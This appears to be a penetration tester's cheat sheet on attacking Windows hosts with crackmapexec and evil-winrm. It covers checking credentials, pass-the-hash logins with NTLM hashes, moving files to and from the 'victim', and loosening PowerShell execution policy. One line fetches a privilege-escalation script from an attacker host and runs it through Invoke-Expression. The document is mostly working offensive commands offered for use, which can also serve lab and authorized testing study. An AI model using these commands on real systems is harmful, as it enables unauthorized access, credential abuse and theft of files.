>crackmapexec winrm [IP] -u [ID] -p [ID]
>crackmapexec smb [IP] -u [ID] -p [ID]
>crackmapexec smb [IP] -u [ID] -H [NTLM Hash]

Check if the ID/PW works or not. multiple protocol supported. The user has to be in the “Remote Management Group”

>evil-winrm -i [IP] -u [USER] -p [Password]
>evil-winrm -i [IP] -u [USER] -H [NTLM Hash]

Ruby tool for connecting to Windows server by WinRM

>evil-winrm -i 10.10.10.161 -u [USER] -p [Hash]

PtH by evil.winrm. The advantage of using evil-winrm is you can run PowerShell scripts in the shell, including PowerSploit

*Evil-WinRM* PS C:\Users\NL>upload [local file path]

Upload the file to the victim

*Evil-WinRM* PS C:\Users\NL>download C:\temp\xxx /home/user/temp/xxx

Download the file from the victim

*Evil-WinRM* PS C:\Users\NL>services

List the services

*Evil-WinRM* PS C:\Users\NL>Set-ExecutionPolicy Unrestricted -Scope CurrentUser

Modify the Execution Policy to the current user only (mostly for the normal user to conduct PrivEsc)

*Evil-WinRM* PS C:\programdata> curl [Attacker IP]/PrivEsc.ps1 -UseBasicParsing | iex
*Evil-WinRM* PS C:\programdata> Get-Command [CMD in PrivEsc.ps1]

The other way to evade the Execution Policy. Read the PS from attacker’s host as a HTTP request and pipe that into iex(Invoke-Expression). -UseBasicParsing will allow the file to come back even if the IE(Internet Explorer) engine isn’t available.